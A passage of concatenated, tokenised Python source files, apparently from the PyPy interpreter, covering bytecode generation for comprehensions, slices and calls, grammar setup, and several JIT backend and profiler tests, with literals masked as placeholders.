<NUM_LIT:0> <EOL> if l . ctx == ast . Store : <EOL> self . emit_op_arg ( ops . UNPACK_SEQUENCE , elt_count ) <EOL> if elt_count : <EOL> self . visit_sequence ( l . elts ) <EOL> if l . ctx == ast . Load : <EOL> self . emit_op_arg ( ops . BUILD_LIST , elt_count ) <EOL> def visit_Dict ( self , d ) : <EOL> self . update_position ( d . lineno ) <EOL> self . emit_op_arg ( ops . BUILD_MAP , <NUM_LIT:0> ) <EOL> if d . values : <EOL> for i in range ( len ( d . values ) ) : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> d . values [ i ] . walkabout ( self ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> d . keys [ i ] . walkabout ( self ) <EOL> self . emit_op ( ops . STORE_SUBSCR ) <EOL> def visit_Name ( self , name ) : <EOL> self . update_position ( name . lineno ) <EOL> self . name_op ( name . id , name . ctx ) <EOL> def visit_keyword ( self , keyword ) : <EOL> self . load_const ( self . space . wrap ( keyword . arg ) ) <EOL> keyword . value . walkabout ( self ) <EOL> def visit_Call ( self , call ) : <EOL> self . 
update_position ( call . lineno ) <EOL> if self . _optimize_builtin_call ( call ) or self . _optimize_method_call ( call ) : <EOL> return <EOL> call . func . walkabout ( self ) <EOL> arg = <NUM_LIT:0> <EOL> call_type = <NUM_LIT:0> <EOL> if call . args : <EOL> arg = len ( call . args ) <EOL> self . visit_sequence ( call . args ) <EOL> if call . keywords : <EOL> self . visit_sequence ( call . keywords ) <EOL> arg |= len ( call . keywords ) << <NUM_LIT:8> <EOL> if call . starargs : <EOL> call . starargs . walkabout ( self ) <EOL> call_type |= <NUM_LIT:1> <EOL> if call . kwargs : <EOL> call . kwargs . walkabout ( self ) <EOL> call_type |= <NUM_LIT:2> <EOL> op = <NUM_LIT:0> <EOL> if call_type == <NUM_LIT:0> : <EOL> op = ops . CALL_FUNCTION <EOL> elif call_type == <NUM_LIT:1> : <EOL> op = ops . CALL_FUNCTION_VAR <EOL> elif call_type == <NUM_LIT:2> : <EOL> op = ops . CALL_FUNCTION_KW <EOL> elif call_type == <NUM_LIT:3> : <EOL> op = ops . CALL_FUNCTION_VAR_KW <EOL> self . emit_op_arg ( op , arg ) <EOL> def _call_has_simple_args ( self , call ) : <EOL> return not call . starargs and not call . kwargs and not call . keywords <EOL> def _optimize_builtin_call ( self , call ) : <EOL> if not self . space . config . objspace . opcodes . CALL_LIKELY_BUILTIN or not self . _call_has_simple_args ( call ) or not isinstance ( call . func , ast . Name ) : <EOL> return False <EOL> func_name = call . func <EOL> assert isinstance ( func_name , ast . Name ) <EOL> name_scope = self . scope . lookup ( func_name . id ) <EOL> if name_scope == symtable . SCOPE_GLOBAL_IMPLICIT or name_scope == symtable . SCOPE_UNKNOWN : <EOL> builtin_index = BUILTIN_TO_INDEX . get ( func_name . id , - <NUM_LIT:1> ) <EOL> if builtin_index != - <NUM_LIT:1> : <EOL> if call . args : <EOL> args_count = len ( call . args ) <EOL> self . visit_sequence ( call . args ) <EOL> else : <EOL> args_count = <NUM_LIT:0> <EOL> arg = builtin_index << <NUM_LIT:8> | args_count <EOL> self . emit_op_arg ( ops . 
CALL_LIKELY_BUILTIN , arg ) <EOL> return True <EOL> return False <EOL> def _optimize_method_call ( self , call ) : <EOL> if not self . space . config . objspace . opcodes . CALL_METHOD or not self . _call_has_simple_args ( call ) or not isinstance ( call . func , ast . Attribute ) : <EOL> return False <EOL> attr_lookup = call . func <EOL> assert isinstance ( attr_lookup , ast . Attribute ) <EOL> attr_lookup . value . walkabout ( self ) <EOL> self . emit_op_name ( ops . LOOKUP_METHOD , self . names , attr_lookup . attr ) <EOL> if call . args : <EOL> self . visit_sequence ( call . args ) <EOL> arg_count = len ( call . args ) <EOL> else : <EOL> arg_count = <NUM_LIT:0> <EOL> self . emit_op_arg ( ops . CALL_METHOD , arg_count ) <EOL> return True <EOL> def _listcomp_generator ( self , list_name , gens , gen_index , elt ) : <EOL> start = self . new_block ( ) <EOL> skip = self . new_block ( ) <EOL> if_cleanup = self . new_block ( ) <EOL> anchor = self . new_block ( ) <EOL> gen = gens [ gen_index ] <EOL> assert isinstance ( gen , ast . comprehension ) <EOL> gen . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . use_next_block ( start ) <EOL> self . emit_jump ( ops . FOR_ITER , anchor ) <EOL> self . use_next_block ( ) <EOL> gen . target . walkabout ( self ) <EOL> if gen . ifs : <EOL> if_count = len ( gen . ifs ) <EOL> for if_ in gen . ifs : <EOL> if_ . accept_jump_if ( self , False , if_cleanup ) <EOL> self . use_next_block ( ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> else : <EOL> if_count = <NUM_LIT:0> <EOL> gen_index += <NUM_LIT:1> <EOL> if gen_index < len ( gens ) : <EOL> self . _listcomp_generator ( list_name , gens , gen_index , elt ) <EOL> else : <EOL> self . name_op ( list_name , ast . Load ) <EOL> elt . walkabout ( self ) <EOL> self . emit_op ( ops . LIST_APPEND ) <EOL> self . use_next_block ( skip ) <EOL> for i in range ( if_count ) : <EOL> self . emit_op_arg ( ops . 
JUMP_FORWARD , <NUM_LIT:1> ) <EOL> if i == <NUM_LIT:0> : <EOL> self . use_next_block ( if_cleanup ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , start , True ) <EOL> self . use_next_block ( anchor ) <EOL> if gen_index == <NUM_LIT:1> : <EOL> self . name_op ( list_name , ast . Del ) <EOL> def visit_ListComp ( self , lc ) : <EOL> self . update_position ( lc . lineno ) <EOL> tmp_name = self . current_temporary_name ( ) <EOL> self . emit_op_arg ( ops . BUILD_LIST , <NUM_LIT:0> ) <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . name_op ( tmp_name , ast . Store ) <EOL> self . _listcomp_generator ( tmp_name , lc . generators , <NUM_LIT:0> , lc . elt ) <EOL> def _genexp_generator ( self , generators , gen_index , elt ) : <EOL> start = self . new_block ( ) <EOL> skip = self . new_block ( ) <EOL> if_cleanup = self . new_block ( ) <EOL> anchor = self . new_block ( ) <EOL> end = self . new_block ( ) <EOL> gen = generators [ gen_index ] <EOL> assert isinstance ( gen , ast . comprehension ) <EOL> self . emit_jump ( ops . SETUP_LOOP , end ) <EOL> self . push_frame_block ( F_BLOCK_LOOP , start ) <EOL> if gen_index == <NUM_LIT:0> : <EOL> self . argcount = <NUM_LIT:1> <EOL> self . name_op ( "<STR_LIT>" , ast . Load ) <EOL> else : <EOL> gen . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . use_next_block ( start ) <EOL> self . emit_jump ( ops . FOR_ITER , anchor ) <EOL> self . use_next_block ( ) <EOL> gen . target . walkabout ( self ) <EOL> if gen . ifs : <EOL> ifs_count = len ( gen . ifs ) <EOL> for if_ in gen . ifs : <EOL> if_ . accept_jump_if ( self , False , if_cleanup ) <EOL> self . use_next_block ( ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> else : <EOL> ifs_count = <NUM_LIT:0> <EOL> gen_index += <NUM_LIT:1> <EOL> if gen_index < len ( generators ) : <EOL> self . _genexp_generator ( generators , gen_index , elt ) <EOL> else : <EOL> elt . walkabout ( self ) <EOL> self . emit_op ( ops . 
YIELD_VALUE ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . use_next_block ( skip ) <EOL> for i in range ( ifs_count ) : <EOL> self . emit_op_arg ( ops . JUMP_FORWARD , <NUM_LIT:1> ) <EOL> if i == <NUM_LIT:0> : <EOL> self . use_next_block ( if_cleanup ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , start , True ) <EOL> self . use_next_block ( anchor ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_LOOP , start ) <EOL> self . use_next_block ( end ) <EOL> def visit_GeneratorExp ( self , genexp ) : <EOL> code = self . sub_scope ( GenExpCodeGenerator , "<STR_LIT>" , genexp , <EOL> genexp . lineno ) <EOL> self . update_position ( genexp . lineno ) <EOL> self . _make_function ( code ) <EOL> first_comp = genexp . generators [ <NUM_LIT:0> ] <EOL> assert isinstance ( first_comp , ast . comprehension ) <EOL> first_comp . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:1> ) <EOL> def visit_Repr ( self , rep ) : <EOL> self . update_position ( rep . lineno ) <EOL> rep . value . walkabout ( self ) <EOL> self . emit_op ( ops . UNARY_CONVERT ) <EOL> def visit_Attribute ( self , attr ) : <EOL> self . update_position ( attr . lineno ) <EOL> names = self . names <EOL> ctx = attr . ctx <EOL> if ctx != ast . AugStore : <EOL> attr . value . walkabout ( self ) <EOL> if ctx == ast . AugLoad : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op_name ( ops . LOAD_ATTR , names , attr . attr ) <EOL> elif ctx == ast . Load : <EOL> self . emit_op_name ( ops . LOAD_ATTR , names , attr . attr ) <EOL> elif ctx == ast . AugStore : <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . emit_op_name ( ops . STORE_ATTR , names , attr . attr ) <EOL> elif ctx == ast . Store : <EOL> self . emit_op_name ( ops . STORE_ATTR , names , attr . attr ) <EOL> elif ctx == ast . Del : <EOL> self . emit_op_name ( ops . DELETE_ATTR , names , attr . 
attr ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> def _simple_slice ( self , slc , ctx ) : <EOL> slice_offset = <NUM_LIT:0> <EOL> stack_count = <NUM_LIT:0> <EOL> if slc . lower : <EOL> slice_offset += <NUM_LIT:1> <EOL> stack_count += <NUM_LIT:1> <EOL> if ctx != ast . AugStore : <EOL> slc . lower . walkabout ( self ) <EOL> if slc . upper : <EOL> slice_offset += <NUM_LIT:2> <EOL> stack_count += <NUM_LIT:1> <EOL> if ctx != ast . AugStore : <EOL> slc . upper . walkabout ( self ) <EOL> if ctx == ast . AugLoad : <EOL> if stack_count == <NUM_LIT:0> : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> elif stack_count == <NUM_LIT:1> : <EOL> self . emit_op_arg ( ops . DUP_TOPX , <NUM_LIT:2> ) <EOL> elif stack_count == <NUM_LIT:2> : <EOL> self . emit_op_arg ( ops . DUP_TOPX , <NUM_LIT:3> ) <EOL> elif ctx == ast . AugStore : <EOL> if stack_count == <NUM_LIT:0> : <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> elif stack_count == <NUM_LIT:1> : <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> elif stack_count == <NUM_LIT:2> : <EOL> self . emit_op ( ops . ROT_FOUR ) <EOL> self . emit_op ( slice_operations ( ctx ) + slice_offset ) <EOL> def _complex_slice ( self , slc , ctx ) : <EOL> if slc . lower : <EOL> slc . lower . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> if slc . upper : <EOL> slc . upper . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> arg = <NUM_LIT:2> <EOL> if slc . step : <EOL> slc . step . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> self . emit_op_arg ( ops . BUILD_SLICE , arg ) <EOL> def _nested_slice ( self , slc , ctx ) : <EOL> if isinstance ( slc , ast . Ellipsis ) : <EOL> self . load_const ( self . space . w_Ellipsis ) <EOL> elif isinstance ( slc , ast . Slice ) : <EOL> self . _complex_slice ( slc , ctx ) <EOL> elif isinstance ( slc , ast . Index ) : <EOL> slc . value . 
walkabout ( self ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> def _compile_slice ( self , slc , ctx ) : <EOL> if isinstance ( slc , ast . Index ) : <EOL> kind = "<STR_LIT:index>" <EOL> if ctx != ast . AugStore : <EOL> slc . value . walkabout ( self ) <EOL> elif isinstance ( slc , ast . Ellipsis ) : <EOL> kind = "<STR_LIT>" <EOL> if ctx != ast . AugStore : <EOL> self . load_const ( self . space . w_Ellipsis ) <EOL> elif isinstance ( slc , ast . Slice ) : <EOL> kind = "<STR_LIT>" <EOL> if not slc . step : <EOL> self . _simple_slice ( slc , ctx ) <EOL> return <EOL> elif ctx != ast . AugStore : <EOL> self . _complex_slice ( slc , ctx ) <EOL> elif isinstance ( slc , ast . ExtSlice ) : <EOL> kind = "<STR_LIT>" <EOL> if ctx != ast . AugStore : <EOL> for dim in slc . dims : <EOL> self . _nested_slice ( dim , ctx ) <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , len ( slc . dims ) ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> if ctx == ast . AugLoad : <EOL> self . emit_op_arg ( ops . DUP_TOPX , <NUM_LIT:2> ) <EOL> elif ctx == ast . AugStore : <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> self . emit_op ( subscr_operations ( ctx ) ) <EOL> def visit_Subscript ( self , sub ) : <EOL> self . update_position ( sub . lineno ) <EOL> if sub . ctx != ast . AugStore : <EOL> sub . value . walkabout ( self ) <EOL> self . _compile_slice ( sub . slice , sub . ctx ) <EOL> class TopLevelCodeGenerator ( PythonCodeGenerator ) : <EOL> def __init__ ( self , space , tree , symbols , compile_info ) : <EOL> PythonCodeGenerator . __init__ ( self , space , "<STR_LIT>" , tree , - <NUM_LIT:1> , <EOL> symbols , compile_info ) <EOL> def _compile ( self , tree ) : <EOL> tree . walkabout ( self ) <EOL> def _get_code_flags ( self ) : <EOL> return <NUM_LIT:0> <EOL> class AbstractFunctionCodeGenerator ( PythonCodeGenerator ) : <EOL> def _handle_nested_args ( self , args ) : <EOL> for i in range ( len ( args ) ) : <EOL> arg = args [ i ] <EOL> if isinstance ( arg , ast . 
Tuple ) : <EOL> self . update_position ( arg . lineno ) <EOL> self . name_op ( "<STR_LIT>" % ( i , ) , ast . Load ) <EOL> arg . walkabout ( self ) <EOL> def _get_code_flags ( self ) : <EOL> scope = self . scope <EOL> assert isinstance ( scope , symtable . FunctionScope ) <EOL> flags = <NUM_LIT:0> <EOL> if scope . locals_fully_known : <EOL> flags |= consts . CO_OPTIMIZED <EOL> if scope . nested : <EOL> flags |= consts . CO_NESTED <EOL> if scope . is_generator : <EOL> flags |= consts . CO_GENERATOR <EOL> if scope . has_variable_arg : <EOL> flags |= consts . CO_VARARGS <EOL> if scope . has_keywords_arg : <EOL> flags |= consts . CO_VARKEYWORDS <EOL> if not self . cell_vars and not self . free_vars : <EOL> flags |= consts . CO_NOFREE <EOL> return PythonCodeGenerator . _get_code_flags ( self ) | flags <EOL> class FunctionCodeGenerator ( AbstractFunctionCodeGenerator ) : <EOL> def _compile ( self , func ) : <EOL> assert isinstance ( func , ast . FunctionDef ) <EOL> if self . is_docstring ( func . body [ <NUM_LIT:0> ] ) : <EOL> doc_expr = func . body [ <NUM_LIT:0> ] <EOL> assert isinstance ( doc_expr , ast . Expr ) <EOL> doc_str = doc_expr . value <EOL> assert isinstance ( doc_str , ast . Str ) <EOL> self . add_const ( doc_str . s ) <EOL> start = <NUM_LIT:1> <EOL> else : <EOL> self . add_const ( self . space . w_None ) <EOL> start = <NUM_LIT:0> <EOL> if func . args . args : <EOL> self . _handle_nested_args ( func . args . args ) <EOL> self . argcount = len ( func . args . args ) <EOL> for i in range ( start , len ( func . body ) ) : <EOL> func . body [ i ] . walkabout ( self ) <EOL> class LambdaCodeGenerator ( AbstractFunctionCodeGenerator ) : <EOL> def _compile ( self , lam ) : <EOL> assert isinstance ( lam , ast . Lambda ) <EOL> if lam . args . args : <EOL> self . _handle_nested_args ( lam . args . args ) <EOL> self . argcount = len ( lam . args . args ) <EOL> lam . body . walkabout ( self ) <EOL> self . emit_op ( ops . 
RETURN_VALUE ) <EOL> class GenExpCodeGenerator ( AbstractFunctionCodeGenerator ) : <EOL> def _compile ( self , genexp ) : <EOL> assert isinstance ( genexp , ast . GeneratorExp ) <EOL> self . update_position ( genexp . lineno ) <EOL> self . _genexp_generator ( genexp . generators , <NUM_LIT:0> , genexp . elt ) <EOL> def _get_code_flags ( self ) : <EOL> flags = AbstractFunctionCodeGenerator . _get_code_flags ( self ) <EOL> return flags | consts . CO_GENERATOR <EOL> class ClassCodeGenerator ( PythonCodeGenerator ) : <EOL> def _compile ( self , cls ) : <EOL> assert isinstance ( cls , ast . ClassDef ) <EOL> self . lineno = self . first_lineno <EOL> self . name_op ( "<STR_LIT>" , ast . Load ) <EOL> self . name_op ( "<STR_LIT>" , ast . Store ) <EOL> self . _handle_body ( cls . body ) <EOL> self . emit_op ( ops . LOAD_LOCALS ) <EOL> self . emit_op ( ops . RETURN_VALUE ) </s>
<s> from sup import run <EOL> def w ( N , start ) : <EOL> class A ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> class B ( object ) : <EOL> def __init__ ( self , x , y ) : <EOL> pass <EOL> start ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < N : <EOL> A ( ) <EOL> A ( ) <EOL> A ( ) <EOL> A ( ) <EOL> A ( ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> i += <NUM_LIT:1> <EOL> run ( w , <NUM_LIT:1000> ) </s>
import os
from pypy.interpreter.pyparser import parser, pytoken, metaparser


class PythonGrammar(parser.Grammar):
    # Grammar subclass wired to the Python token/operator tables.
    KEYWORD_TOKEN = pytoken.python_tokens["<STR_LIT>"]
    TOKENS = pytoken.python_tokens
    OPERATOR_MAP = pytoken.python_opmap


def _get_python_grammar():
    """Read the bundled grammar file and build a PythonGrammar from it."""
    here = os.path.dirname(__file__)
    fp = open(os.path.join(here, "<STR_LIT:data>", "<STR_LIT>"))
    try:
        gram_source = fp.read()
    finally:
        fp.close()
    pgen = metaparser.ParserGenerator(gram_source)
    return pgen.build_grammar(PythonGrammar)


python_grammar = _get_python_grammar()

# A shared copy of the grammar with two keywords removed (keys masked --
# presumably the with-statement keywords; TODO confirm).
python_grammar_no_with_statement = python_grammar.shared_copy()
python_grammar_no_with_statement.keyword_ids = python_grammar_no_with_statement.keyword_ids.copy()
del python_grammar_no_with_statement.keyword_ids["<STR_LIT>"]
del python_grammar_no_with_statement.keyword_ids["<STR_LIT>"]


class _Tokens(object):
    pass
# Expose every token id as an attribute of the `tokens` singleton.
for tok_name, idx in pytoken.python_tokens.iteritems():
    setattr(_Tokens, tok_name, idx)
tokens = _Tokens()


class _Symbols(object):
    pass
# Expose every grammar symbol id as an attribute of the `syms` singleton.
for sym_name, idx in python_grammar.symbol_ids.iteritems():
    setattr(_Symbols, sym_name, idx)
syms = _Symbols()

# Remove build-time helpers from the module namespace.
del _get_python_grammar, _Tokens, tok_name, sym_name, idx
from pypy.interpreter.eval import Frame
from pypy.interpreter.pycode import PyCode


class TestFrame:
    def setup_method(self, method):
        # Build a PyCode for a function with two positionals plus *args, and
        # a minimal concrete Frame exposing its fast-locals array directly.
        def c(x, y, *args):
            pass
        code = PyCode._from_code(self.space, c.func_code)

        class ConcreteFastscopeFrame(Frame):
            def __init__(self, space, code, numlocals):
                self.code = code
                Frame.__init__(self, space, numlocals=numlocals)
                self.fastlocals_w = [None] * self.numlocals

            def getcode(self):
                return self.code

            def setfastscope(self, scope_w):
                self.fastlocals_w = scope_w

            def getfastscope(self):
                return self.fastlocals_w

        self.f = ConcreteFastscopeFrame(self.space, code, numlocals=<NUM_LIT:5>)

    def test_fast2locals(self):
        # fast2locals() should mirror set fast-local slots into w_locals,
        # skipping unset (None) slots.
        space = self.space
        w = space.wrap
        self.f.fast2locals()
        assert space.eq_w(self.f.w_locals, self.space.wrap({}))
        self.f.fastlocals_w[<NUM_LIT:0>] = w(<NUM_LIT:5>)
        self.f.fast2locals()
        assert space.eq_w(self.f.w_locals, self.space.wrap({'<STR_LIT:x>': <NUM_LIT:5>}))
        self.f.fastlocals_w[<NUM_LIT:2>] = w(<NUM_LIT:7>)
        self.f.fast2locals()
        assert space.eq_w(self.f.w_locals,
                          self.space.wrap({'<STR_LIT:x>': <NUM_LIT:5>, '<STR_LIT:args>': <NUM_LIT:7>}))

    def sameList(self, l1, l2):
        # Helper: element-wise equality where None means "unset slot".
        assert len(l1) == len(l2)
        for w_1, w_2 in zip(l1, l2):
            assert (w_1 is None) == (w_2 is None)
            if w_1 is not None:
                assert self.space.eq_w(w_1, w_2)

    def test_locals2fast(self):
        # locals2fast() should copy w_locals entries back into the
        # fast-locals array by variable name.
        w = self.space.wrap
        self.f.w_locals = self.space.wrap({})
        self.f.locals2fast()
        self.sameList(self.f.fastlocals_w, [None] * <NUM_LIT:5>)
        self.f.w_locals = self.space.wrap({'<STR_LIT:x>': <NUM_LIT:5>})
        self.f.locals2fast()
        self.sameList(self.f.fastlocals_w, [w(<NUM_LIT:5>)] + [None] * <NUM_LIT:4>)
        self.f.w_locals = self.space.wrap({'<STR_LIT:x>': <NUM_LIT:5>, '<STR_LIT:args>': <NUM_LIT:7>})
        self.f.locals2fast()
        self.sameList(self.f.fastlocals_w, [w(<NUM_LIT:5>), None, w(<NUM_LIT:7>),
                                            None, None])
import py
from pypy.jit.backend.cli.test.test_zrpy_basic import CliTranslatedJitMixin
from pypy.jit.metainterp.test import test_loop


class TestLoop(CliTranslatedJitMixin, test_loop.TestOOtype):
    # Run the generic loop tests against the translated CLI backend.

    def skip(self):
        py.test.skip('<STR_LIT>')

    # Disabled for this backend: overridden to no-ops.
    def test_interp_many_paths(self):
        pass

    def test_interp_many_paths_2(self):
        pass
<s> """<STR_LIT>""" <EOL> import weakref <EOL> import py <EOL> from pypy . rlib import rgc <EOL> from pypy . rlib . jit import JitDriver <EOL> from pypy . jit . backend . llvm . runner import LLVMCPU <EOL> class X ( object ) : <EOL> next = None <EOL> def get_test ( main ) : <EOL> main . _dont_inline_ = True <EOL> def g ( n ) : <EOL> x = X ( ) <EOL> x . foo = <NUM_LIT:2> <EOL> main ( n , x ) <EOL> x . foo = <NUM_LIT:5> <EOL> return weakref . ref ( x ) <EOL> g . _dont_inline_ = True <EOL> def entrypoint ( args ) : <EOL> r_list = [ ] <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> r = g ( <NUM_LIT> ) <EOL> r_list . append ( r ) <EOL> rgc . collect ( ) <EOL> rgc . collect ( ) ; rgc . collect ( ) <EOL> freed = <NUM_LIT:0> <EOL> for r in r_list : <EOL> if r ( ) is None : <EOL> freed += <NUM_LIT:1> <EOL> print freed <EOL> return <NUM_LIT:0> <EOL> return entrypoint <EOL> def compile_and_run ( f , gc , ** kwds ) : <EOL> from pypy . annotation . listdef import s_list_of_strings <EOL> from pypy . translator . translator import TranslationContext <EOL> from pypy . jit . metainterp . warmspot import apply_jit <EOL> from pypy . translator . c import genc <EOL> t = TranslationContext ( ) <EOL> t . config . translation . gc = gc <EOL> t . config . translation . gcconfig . debugprint = True <EOL> for name , value in kwds . items ( ) : <EOL> setattr ( t . config . translation , name , value ) <EOL> t . buildannotator ( ) . build_types ( f , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> if kwds [ '<STR_LIT>' ] : <EOL> apply_jit ( t , CPUClass = LLVMCPU ) <EOL> cbuilder = genc . CStandaloneBuilder ( t , f , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> return data . splitlines ( ) [ - <NUM_LIT:1> ] . 
strip ( ) <EOL> def test_compile_boehm ( ) : <EOL> myjitdriver = JitDriver ( greens = [ ] , reds = [ '<STR_LIT:n>' , '<STR_LIT:x>' ] ) <EOL> def main ( n , x ) : <EOL> while n > <NUM_LIT:0> : <EOL> myjitdriver . can_enter_jit ( n = n , x = x ) <EOL> myjitdriver . jit_merge_point ( n = n , x = x ) <EOL> y = X ( ) <EOL> y . foo = x . foo <EOL> n -= y . foo <EOL> res = compile_and_run ( get_test ( main ) , "<STR_LIT>" , jit = True ) <EOL> assert int ( res ) >= <NUM_LIT:16> </s>
from pypy.jit.metainterp.test.test_recursive import RecursiveTests
from pypy.jit.backend.x86.test.test_basic import Jit386Mixin


class TestRecursive(Jit386Mixin, RecursiveTests):
    # Run the generic recursion tests against the x86 backend; the mixin
    # supplies the backend-specific test machinery.
    pass
from pypy.rpython.lltypesystem import lltype, rclass


def get_vtable_for_gcstruct(cpu, GCSTRUCT):
    """Return the vtable for *GCSTRUCT*, or None if it is not an instance.

    Walks the chain of first-substructures until one whose hints contain the
    (masked) marker key is found; returns None if the chain ends first.
    """
    assert isinstance(GCSTRUCT, lltype.GcStruct)
    HEAD = GCSTRUCT
    while not HEAD._hints.get('<STR_LIT>'):
        _, HEAD = HEAD._first_struct()
        if HEAD is None:
            return None
    setup_cache_gcstruct2vtable(cpu)
    return cpu._cache_gcstruct2vtable[GCSTRUCT]


def setup_cache_gcstruct2vtable(cpu):
    # Lazily build and memoize the GcStruct -> vtable mapping on the cpu
    # (guard attribute name masked -- presumably '_cache_gcstruct2vtable';
    # TODO confirm).
    if not hasattr(cpu, '<STR_LIT>'):
        cache = {}
        cache.update(testing_gcstruct2vtable)
        for rinstance in cpu.rtyper.instance_reprs.values():
            cache[rinstance.lowleveltype.TO] = rinstance.rclass.getvtable()
        cpu._cache_gcstruct2vtable = cache


def set_testing_vtable_for_gcstruct(GCSTRUCT, vtable, name):
    # Give *vtable* a NUL-terminated low-level name array and register it in
    # the test-only mapping consulted by setup_cache_gcstruct2vtable().
    namez = name + '<STR_LIT:\x00>'
    vtable.name = lltype.malloc(rclass.OBJECT_VTABLE.name.TO, len(namez),
                                immortal=True)
    for i in range(len(namez)):
        vtable.name[i] = namez[i]
    testing_gcstruct2vtable[GCSTRUCT] = vtable

testing_gcstruct2vtable = {}
from pypy.jit.metainterp.warmspot import ll_meta_interp
from pypy.rlib.jit import JitDriver, dont_look_inside, purefunction
from pypy.jit.metainterp.test.test_basic import LLJitMixin
from pypy.jit.metainterp import pyjitpl
from pypy.jit.metainterp.jitprof import *


class FakeProfiler(Profiler):
    # Deterministic profiler: the fake timer advances by exactly one per
    # call and every start/end event is recorded (end events bit-negated).
    def __init__(self):
        self.counter = <NUM_LIT>
        self.events = []

    def timer(self):
        # Return the pre-increment value so successive calls differ by 1.
        self.counter += <NUM_LIT:1>
        return self.counter - <NUM_LIT:1>

    def _start(self, event):
        Profiler._start(self, event)
        self.events.append(event)

    def _end(self, event):
        Profiler._end(self, event)
        self.events.append(~event)


class ProfilerMixin(LLJitMixin):
    def meta_interp(self, *args, **kwds):
        # Force every meta_interp call to use the deterministic FakeProfiler
        # (keyword name masked -- presumably 'ProfilerClass'; TODO confirm).
        kwds = kwds.copy()
        kwds['<STR_LIT>'] = FakeProfiler
        return LLJitMixin.meta_interp(self, *args, **kwds)


class TestProfile(ProfilerMixin):
    def test_simple_loop(self):
        myjitdriver = JitDriver(greens=[], reds=['<STR_LIT:x>', '<STR_LIT:y>', '<STR_LIT>'])
        def f(x, y):
            res = <NUM_LIT:0>
            while y > <NUM_LIT:0>:
                myjitdriver.can_enter_jit(x=x, y=y, res=res)
                myjitdriver.jit_merge_point(x=x, y=y, res=res)
                res += x
                y -= <NUM_LIT:1>
            return res * <NUM_LIT:2>
        res = self.meta_interp(f, [<NUM_LIT:6>, <NUM_LIT:7>])
        assert res == <NUM_LIT>
        profiler = pyjitpl._warmrunnerdesc.metainterp_sd.profiler
        # Expected phases: tracing (with backend compilation nested inside),
        # then running the compiled loop, then falling back to blackhole.
        expected = [
            TRACING,
            BACKEND,
            ~BACKEND,
            ~TRACING,
            RUNNING,
            ~RUNNING,
            BLACKHOLE,
            ~BLACKHOLE
        ]
        assert profiler.events == expected
        assert profiler.times == [<NUM_LIT:2>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:1>]
        assert profiler.counters == [<NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:4>,
                                     <NUM_LIT:3>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:7>, <NUM_LIT:1>,
                                     <NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:0>]

    def test_simple_loop_with_call(self):
        @dont_look_inside
        def g(n):
            pass
        myjitdriver = JitDriver(greens=[], reds=['<STR_LIT:x>', '<STR_LIT:y>', '<STR_LIT>'])
        def f(x, y):
            res = <NUM_LIT:0>
            while y > <NUM_LIT:0>:
                myjitdriver.can_enter_jit(x=x, y=y, res=res)
                myjitdriver.jit_merge_point(x=x, y=y, res=res)
                res += x
                g(x)
                y -= <NUM_LIT:1>
            return res * <NUM_LIT:2>
        res = self.meta_interp(f, [<NUM_LIT:6>, <NUM_LIT:7>])
        assert res == <NUM_LIT>
        profiler = pyjitpl._warmrunnerdesc.metainterp_sd.profiler
        # Per-phase [residual, pure] call counts -- TODO confirm semantics.
        assert profiler.calls == [[<NUM_LIT:1>, <NUM_LIT:0>], [<NUM_LIT:1>, <NUM_LIT:0>], [<NUM_LIT:0>, <NUM_LIT:0>]]

    def test_blackhole_pure(self):
        @purefunction
        def g(n):
            return n + <NUM_LIT:1>
        myjitdriver = JitDriver(greens=['<STR_LIT:z>'], reds=['<STR_LIT:y>', '<STR_LIT:x>', '<STR_LIT>'])
        def f(x, y, z):
            res = <NUM_LIT:0>
            while y > <NUM_LIT:0>:
                myjitdriver.can_enter_jit(x=x, y=y, res=res, z=z)
                myjitdriver.jit_merge_point(x=x, y=y, res=res, z=z)
                res += x
                if y == <NUM_LIT:1>:
                    res += g(z)
                y -= <NUM_LIT:1>
